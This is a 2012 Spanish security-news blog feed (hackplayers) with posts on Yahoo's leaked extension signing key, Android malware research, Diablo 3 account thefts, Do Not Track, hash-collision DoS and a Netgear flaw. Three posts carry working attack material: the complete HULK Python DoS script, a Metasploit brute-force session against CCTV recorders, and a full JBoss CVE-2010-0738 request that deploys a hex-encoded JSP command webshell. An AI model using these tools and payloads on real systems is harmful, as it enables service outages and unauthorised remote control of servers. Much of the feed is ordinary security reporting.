hackplayers

Yahoo! expone su clave privada dentro de la extensión Axis para Chrome

2012-05-24T16:25:00.001+02:00

Yahoo! acaba de anunciar su nuevo navegador Axis implementado como una extensión para Chrome, Firefox e Internet Explorer y no lo han estrenado precisamente bien: han dejado la clave privada para firmar la extensión dentro del propio paquete de la extensión de Chrome.

El australiano Nik Cubrilovic explicaba en su blog que al revisar el código encontró el fichero .pem, el certificado que usa Yahoo! para firmar su extensión y para que Chrome pueda comprobar su autenticidad.

El resultado es que con la clave privada cualquier atacante podría crear una extensión para Chrome y el navegador "confiaría" en ella creyendo que proviene de Yahoo!.

Para demostrar además la vulnerabilidad, Nik ha creado una extensión de prueba con una alerta en javascript firmada con este certificado privado. El código lo podéis encontrar en un repositorio en GitHub. Si lo probáis, veréis que al pinchar el enlace la extensión se instalará directamente en Chrome.

Imaginaros una extensión falsa que capture el tráfico web (incluidas las contraseñas) y que, por ejemplo, se instalara en los usuarios al falsificar la entrada DNS de la URL de actualización...

Proyecto Genoma de Malware para Android

2012-05-23T10:50:00.000+02:00

Los investigadores de seguridad en dispositivos móviles reclaman un esfuerzo global para compartir datos sobre malware dirigido a la plataforma Android con el objetivo de mejorar la capacidad de defenderse contra estos ataques.

El Proyecto Genoma de Malware para Android ha sido creado por Yajin Zhou y Xuxian Jiang, investigadores de la North Carolina State, y ya ha recogido más de 1.200 piezas de malware. El proyecto está diseñado para compartir todo el código relacionado con el malware en Android con el objetivo de facilitar la investigación de seguridad. Jiang y su equipo han sido los primeros en identificar docenas de aplicaciones de malware, incluyendo DroidKungFu y GingerMaster.

Jiang anunció el proyecto el 22 de mayo en el Simposio IEEE sobre Seguridad y Privacidad en San Francisco.

El proyecto es importante, dice Jiang, ya que "nuestra capacidad de defensa está muy restringida por la limitada comprensión del malware móvil emergente y la oportuna falta de acceso a muestras relacionadas. Nuestra comunidad de investigación tiene que hacer un mejor trabajo para el intercambio de datos, si queremos desarrollar a tiempo la próxima generación de soluciones de seguridad móvil."

Fuente: Announcing the Android Malware Genome Project

Comprometidas multitud de cuentas de Diablo 3

2012-05-22T18:25:00.002+02:00

Al parecer Blizzard ha sido objeto de un importante ataque que dio como resultado el robo de cuentas de Diablo 3 (o items de cuentas) durante los días 19 y 20 de mayo. Probablemente este ataque fue la razón de que muchos servidores europeos fueran cerrados durante unas cuatro horas.

Muchos jugadores se han quejado de la falta de información en el foro de Battle.net oficial, donde circulan rumores acerca de inyecciones SQL, secuestro de sesiones e incluso phising. Parece que los usuarios que registraron actividad con otros jugadores como “leyiong”, “Nevin”, “SBJunkie”, “luckllezz (George Melchers)”, “McLeast” o incluso otros desconocidos podrían haber sido comprometidos.

Para todos Blizzard recomienda visitar cambiar la contraseña y usar el autenticador. No obstante algunos jugadores que usan el autenticador también han sido hackeados, por lo que cobra fuerza que los atacantes han podido explotar una vulnerabilidad en el lado del servidor. Estaremos atentos a más noticias :)

Referencias:

- Blizzard addresses Diablo 3 account hacks, outlines security measures

- Diablo 3 Hacked Accounts Are Reason Enough For An Offline Mode

- Stolen handshakes: session ID hijacking rumors in Diablo III may be overblown

- Blizzard Breached: 'Diablo III' Player Accounts Hacked, Items and Gold Stolen [Updated]

- Accounts on Diablo 3 hacked...
- Diablo 3 accounts hacked, items stolen, real money auction house due next week

No me rastreen, gracias: Do Not Track (DNT)

2012-05-21T16:26:00.000+02:00

Como muchos sabréis Do Not Track (DNT) es una iniciativa para permitir a los usuarios decidir si quieren ser o no rastreados en Internet. Fue impulsada por Mozilla (guía de campo), apoyada por la Federación de Comercio estadounidense y gracias al consorcio W3C se convertirá en estándar web en octubre de este año. Ya ha sido apoyada por Google, Opera, Microsoft y recientemente ha sido también incluida en Twitter.

Y si crees que el rastreo en Internet no es importante o es poca cosa, te invitamos a probar la extensión de Firefox Collusion. Con ella podrás crear un mapa interactivo a partir del sitio que estés visitando, mostrando en tiempo real las páginas que utilizan cookies de terceros para rastrear tu actividad y cómo éstas interaccionan con las principales compañías de seguimiento, compartiendo la información de todos tus movimientos.

Así que, si quieres activarlo en tu navegador para mantener la privacidad en sitios que permitan DNT, sólo tendrás que seguir unos sencillos pasos:

Si estás usando Firefox 5:

Abre el menú de preferencias y haz clic en Privacidad.
Marca la casilla Decirle a los sitios web que no quiero ser rastreado.

Si estás usando Internet Explorer 9:

Visita esta página de test de Do Not Track para información de cómo configurar Internet Explorer 9, y abajo haz clic para añadir una lista de protección de rastreo vacía (Click here to add an empty Tracking Protection list).
Cuando se muestre la ventana de dialogo, haz clic en el botón Añadir Lista.
Para más detalle consulta la página de ayuda de Microsoft.

Si estás usando Safari 5.1:

En las preferencias de Safari, clic en Avanzado.
A continuación, marca la casilla Mostrar el menú de desarrollo en la barra de menú (imagen 1, abajo).
Cierra la ventana de preferencias, y en el nuevo menú de desarrollo, selecciona Enviar cabecera HTTP Do Not Track (imagen 2).

Si estás usando Chrome 17.0 o superior, hay un extensión que habilita DNT:

Abre Chrome, y selecciona Extensiones.
Haz clic en el enlace para Obtener más extensiones.
Busca “Do Not Track” de Jonathan Mayer.
Para añadir "Do Not Track” a tu navegador Chrome, haz clic en Añadir a Chrome y haz clic en añadir otra vez cuando veas el disclaimer.
Vuelve a las extensiones y asegúrate que se ha añadido y activado correctamente.

Ataques DoS efectivos mediante colisiones de hashes

2012-05-18T02:00:00.000+02:00

Durante la conferencia 28c3 (28th Chaos Communication Congress) de finales del año pasado en Berlín, Alexander “alech” Klink y Julian “zeri” Wälde ofrecieron una interesante charla titulada "Ataques de denegación de servicio eficientes sobre plataformas de aplicaciones web". En ella hablan de ataques basados en colisiones de hashes que causan fácilmente pérdidas de servicio en un gran porcentaje de aplicaciones web.

Pero, ¿en qué consisten estos ataques?. Muchas aplicaciones web automáticamente recogen los parámetros de cada petición y los pegan en un hash de pares de claves para aumentar el rendimiento y la velocidad. La idea es "colisionar" estos hashes mediante peticiones http post para que el servidor objetivo consuma una gran cantidad de CPU al procesarlos.

Si un atacante es capaz de entender los valores usados en el algoritmo de hashing puede pre-calcular un conjunto de valores de hashes que den como resultado el mismo. Comparar estos hashes se convierte en una función cuadrática que puede crear una carga muy pesada en el servidor web.

Por ejemplo, enviar aproximadamente dos megabytes de valores que computan el mismo hash provoca que el servidor tenga que comparar más de 40 billones de strings. Wow!

Es fácil encontrar estas colisiones en lenguages que no aleatorizan las funciones de hashing: node.js/v8, php, python, ASP, ruby, java, etc. Sólo unos pocos se salvan, como cruby (1.9 ~2008) o perl (5.8.1 ~2003). De hecho se comenzó esta investigación a partir de la FAQ de seguridad de Perl (perldoc perlsec) en la que se habla de un fallo de seguridad en versiones anteriores a la 5.8.1, que permitían ataques de colisiones de hashes. Podéis encontrar los lenguajes y versiones afectas y parcheadas aquí.

Y finalmente, ¿cómo puedo explotar esta vulnerabilidad? Pues existe una herramienta escrita en Java que puede ayudar a comprobar fácilmente si nuestro servidor es vulnerable: PostTester. Eso sí, la versión gratuita está limitada sólo a direccionamiento privado (127.0.0.x, 10.xxx, 172.16.xx a 172.31.xx y 192.168.xx).

HULK, una herramienta DoS para servidores web

2012-05-17T18:50:00.000+02:00

La mayoría de las herramientas DoS comparten un problema... crean patrones repetibles, demasiado fáciles de predecir y, por lo tanto, permiten mitigar sus efectos.

HULK (Http Unbearable Load King) es una sencilla herramienta DoS escrita en Python cuyo principal objetivo es generar peticiones únicas para evitar/evadir motores de caché e incidir directamente en la carga del servidor. Las principales técnicas que utiliza son las siguientes:

- Ofuscación del origen: cada petición del cliente se envía con un agente de usuario distinto seleccionado aleatoriamente de una lista.

- Falsificación de referencias: el referer que incluye la petición está ofuscado y apunta hacia el mismo servidor objetivo u otros sitios web conocidos.

- Adhesión: utiliza comandos estándar HTTP para tratar de hacer que el servidor mantenga las conexiones abiertas mediante el uso de Keep-Alive con una ventana de tiempo variable.

- no-cache: se solicita al servidor HTTP no-cache para obtener una página única.

- Transformación de URL única: para evitar la caché y otras herramientas de optimización, se utilizan nombres de parámetros y valores aleatoriamente en cada petición, lo que hace que cada petición sea única y que el servidor tenga que procesarla en cada caso.

Resultados

El autor Barry Shteiman comenta que ha realizado pruebas contra un servidor web con 4GB de RAM y Microsoft IIS7 y fue capaz de tirarlo en menos de un minuto, lanzando todas las peticiones desde un único host.

En las siguientes imágenes se puede ver la herramienta en acción donde, en la primera (#1), se ejecuta contra una URL y a continuación comienza a generar una carga de solicitudes únicas y las envía hacia el servidor objetivo (host de la URL) y, en segundo lugar (#2), podemos ver que el servidor en algún momento empieza a dejar de responder ya que ha agotado su fondo de recursos.

nota: el parámetro opcional "safe" significa matar el proceso cuando los hilos consigan un error 500.

Descarga

Fichero : hulk.py ( fichero zip)

# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them
# to their knees by exhausting the resource pool, its is meant for research purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
    global request_counter
    request_counter+=1

def set_flag(val):
    global flag
    flag=val

def set_safe():
    global safe
    safe=1
    
# generates a user agent array
def useragent_list():
    global headers_useragents
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers.append('http://www.google.com/?q=')
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    return(headers_referers)
    
#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def usage():
    print '---------------------------------------------------'
    print 'USAGE: python hulk.py '
    print 'you can add "safe" after url, to autoshut after dos'
    print '---------------------------------------------------'

    
#http request
def httpcall(url):
    useragent_list()
    referer_list()
    code=0
    if url.count("?")>0:
        param_joiner="&"
    else:
        param_joiner="?"
    request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    try:
            urllib2.urlopen(request)
    except urllib2.HTTPError, e:
            #print e.code
            set_flag(1)
            print 'Response Code 500'
            code=500
    except urllib2.URLError, e:
            #print e.reason
            sys.exit()
    else:
            inc_counter()
            urllib2.urlopen(request)
    return(code)        

    
#http caller thread 
class HTTPThread(threading.Thread):
    def run(self):
        try:
            while flag<2:
                code=httpcall(url)
                if (code==500) & (safe==1):
                    set_flag(2)
        except Exception, ex:
            pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
    def run(self):
        previous=request_counter
        while flag==0:
            if (previous+100request_counter):
                print "%d Requests Sent" % (request_counter)
                previous=request_counter
        if flag==2:
            print "\n-- HULK Attack Finished --"

#execute 
if len(sys.argv) < 2:
    usage()
    sys.exit()
else:
    if sys.argv[1]=="help":
        usage()
        sys.exit()
    else:
        print "-- HULK Attack Started --"
        if len(sys.argv)== 3:
            if sys.argv[2]=="safe":
                set_safe()
        url = sys.argv[1]
        if url.count("/")==2:
            url = url + "/"
        m = re.search('http\://([^/]*)/?.*', url)
        host = m.group(1)
        for i in range(500):
            t = HTTPThread()
            t.start()
        t = MonitorThread()
        t.start()

Esta herramienta está pensada para propósitos educativos solamente y no debe ser utilizada para ninguna actividad maliciosa.

Fuente: HULK, Web Server DoS Tool | SECTORIX

Hacking de sistemas CCTV con Metasploit

2012-05-16T13:50:00.001+02:00

Un nuevo módulo para el Framework de Metasploit, cctv_dvr_login, descubre y pone a prueba la seguridad de los sistemas de vídeo vigilancia de los circuitos cerrados de televisión (CCTV). Estos sistemas suelen utilizarse en pequeñas tiendas, comunidades de vecinos, residencias personales y entornos empresariales como parte de su programa de seguridad física. Sin embargo, muchos de estos sistemas son vulnerables y pueden permitir a un atacante obtener acceso remoto. Este acceso remoto, activado por defecto, puede permitir no sólo la posibilidad de ver vídeo en tiempo real, si no también el control de las cámaras (si es compatible) y facilitar el acceso a imágenes de archivo.

La mayoría de los propietarios de los sistemas de vigilancia de vídeo de CCTV pueden incluso no ser conscientes de las capacidades de su dispositivo, algunos de los cuales pueden estar expuestos a Internet, ya sea intencionalmente o por accidente.

En este módulo se dirige a sistemas CCTV de Microdigital, HiVision, CTRing y un número importante de otros dispositivos provenientes de estas marcas. Es capaz de descubrir los equipos existentes en la red, determinar los usuarios válidos y excluir los que no lo son y realizar ataques de fuerza bruta para obtener un login válido:

msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit

[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:’admin’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:’user’ with password:”
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: ‘user’
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:’admin’ with password:’admin’
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: ‘admin’
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:’admin’ with password:’1111’
[+] 10.10.1.14:5920 Successful login: ‘admin’ : ‘1111’
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Más detalles técnicos en Gotham Digital Science Blog.

CCTVs: http://eripp.com/?ipdb=1&search=DVR+WebViewer&sort=time&order=DESC&limit=200&submitbutton=Search

ClubHACK Magazine nº28

2012-05-16T10:21:00.002+02:00

Se ha publicado el número 28 (mayo 2012) de Clubhack Magazine. Este mes, la revista india incluye artículos que tratan asuntos tan interesantes como la esteganografía en covert channels, la herramienta Kautilya que facilita el uso de USB HID como Teensy++, el protocolo HTTPS, el robo de identidad y algunas pequeñas medidas para evitar la inyección en nuestro código.

Índice:
0x01 - Steganography over converted channels (Tech Gyan)
0x02 - Kauntilya (Tool Gyan)
0x03 - HTTPS (Hyper Text Transfer Protocol Secure) (Mom's Gide)
0x04 - Section 66C - Punishment for identity theft (Legal Gyan)
0x05 - Don’t Get Injected – Fix Your Code (Code Gyan)

La versión PDF puede descargarse desde: http://chmag.in/issue/may2012.pdf

La 9ª de Anonymous compromete los sitios web de Capio Sanidad

2012-05-14T19:15:00.000+02:00

La 9ª compañía ha publicado un mensaje informando que han tomado "el control de TODA su identidad online: Capio Sanidad, Capio Enfermería y, aun más grave, las webs de los Hospitales que gestiona, incluyendo citas online, analíticas, etc.".

El grupo de Anonymous lleva a cabo esta acción contra la privatización de la sanidad pública y particularmente en represalia contra Capio Sanidad, que se llevará próximamente los hospitales públicos de Castilla La Mancha y Valencia.

Si observamos con detalle el vídeo, vemos que la web utilizaba un servidor de aplicaciones Jboss desactualizado (4.2.3 GA) y la consola JMX era accesible publicamente (www.capiosanidad.es/jmx-console/).

La "demo" muestra como era posible apagar remotamente el servidor de aplicaciones, pero áun más interesante son las URLs que demuestran que se ha conseguido desplegar un webshell (/zecmd/zecmd.jsp).

Probablemente esto se consiguió a través del mbean DeploymentFileRepository y aprovechando la vulnerabilidad CVE-2010-0738: la consola sólo aplica restricciones de seguridad para peticiones GET y POST, obviando otros métodos como HEAD.

Esto nos podría permitir desarrollar una petición para subir y desplegar un war malicioso, tal y como ya explotó masivamente el gusano Linda:

$zecmd = "HEAD /jmx-console/HtmlAdaptor?
action=invokeOpByName
&name=jboss.admin%3Aservice%3DDeploymentFileRepository
&methodName=store
&argType=java.lang.String
&arg0=zecmd.war
&argType=java.lang.String
&arg1=zecmd
&argType=java.lang.String
&arg2=.jsp
&argType=java.lang.String
&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e
&argType=boolean
&arg4=True HTTP/1.0\r\n\r\n";

Lamentable es la privatización de nuestra sanidad pública y lamentable es que no se destinen los recursos necesarios para proteger la seguridad de los sistemas informáticos que alojan los datos de miles de pacientes.

Recordemos que son datos de carácter personal de nivel alto (LOPD). ¿Se ha llevado a cabo la correspondiente auditoría?, ¿existe el conjunto de medidas de carácter técnico y organizativo que está obligado a implantar el responsable del fichero a fin de garantizar la seguridad de los equipos y sistemas informáticos?

Exposicion de info sensible en routers Netgear WNDRMAC

2012-05-14T11:18:00.000+02:00

Nathaniel Carew de Sense of Security Labs ha reportado una vulnerabilidad en el router NETGEAR Wireless Extreme (WNDRMAC) N600, el cual muestra información sensible en el código fuente de su interfaz web. Concretamente, si se ha configurado la recuperación de contraseña, un atacante podría obtener las respuestas de las preguntas de seguridad y loggearse en el dispositivo.

Inicialmente, si fallamos al introducir el login del administrador, observamos si está activada la recuperación:

Y simplemente, en el cgi correspondiente, podemos ver las preguntas y las respuestas con las que podremos acceder al router con las credenciales de administración:

Por el momento se recomienda desactivar la opción de recuperación de contraseñas.